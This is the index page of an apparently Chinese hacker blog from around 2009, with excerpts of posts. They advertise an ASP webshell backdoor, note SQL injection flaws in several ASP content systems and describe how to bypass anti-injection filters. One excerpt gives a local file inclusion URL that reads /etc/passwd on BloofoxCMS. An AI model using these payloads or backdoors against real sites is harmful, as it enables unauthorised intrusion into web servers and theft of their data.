导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

126oo-CMS-电影系统更新后的漏洞

没作者信息.....
更新后的代码修改了之前后台绕过的方式。

利用随机函数

Sub chklogin

        dim sql,rs

        dim M_Name,loginValidate

        M_Name = GetCookie("AdminName

.......

网趣网上购物系统时尚版 v3.2注入漏洞

涉及版本:网趣网上购物系统时尚版 v3.2

漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp

漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.

关键代码:

.....

关于利用注射点判断数据库web是否分离

Author: kook1991

得到客户端主机名:

select host_name();



得到服务端主机名:

....

eweb2.7版本以下又一个注入

首先看代码(ewebeditor.asp):
ub InitPara()
' 取全屏标志
sFullScreen = Trim(Request.QueryString("fullscreen"))
' 取对应的内容ID
sContentID = Trim(Request.QueryString("id"))
If sContentID = "" Then ShowErr "请传入调用参数ID,即隐藏的内容表单项ID!"
...

一种黑客防注入代码的绕过学习总结

算不上原创,就不写了。
文章的想法,就是学习记录一下这个学习的过程……
没有创新的东东,都是前辈的东西。自己的总结……
前些阵子讯时系统爆出了很多洞,先看他的怎么写的,下面是从他的admin_conn.asp文件中找到的。

sss=LCase(request.servervariables(”QUERY_STRING”))
if instr(sss,”select”)<>0 or instr(sss,”inster”)<>0 or instr(sss,”delete”)<>0 or

instr(sss,”(”)<>0 or instr(sss,”‘or”)<>0 then
response.write “你的网址不合法”
response.end
end if

代码使用了 request.servervariables的方法来获得传递过来的数据,然后赋值给sss。再判断传递过来的sss变量中是否含有 select,inster等敏感的字符串,只要有就结束程序。给普通注入造成了极大的麻烦,需要有新的东西出现来突破这个防注入。
现已知的有两种方法:

BloofoxCMS Local File Inclusion Vulnerability

magic_quotes_gpc = Off
register_globals = On

- File Inclusion -
http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
...

自由动力(My Power)3.6 sp2的注入漏洞

.6 sp2/Easypower4.0以下免费版本

漏洞描述:
详细说明:自由动力3.6 sp2中多个文件过滤不严存在注入漏洞
下列文件匀存在被注入的危险:
Article_Class.ASP
Photo_Class.asp
Soft_Class.asp
UserInfo.ASP
<*参考
http://www.gaisoft.com/2005/1-3/01013.html
*>

...

分页:[«]1[»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved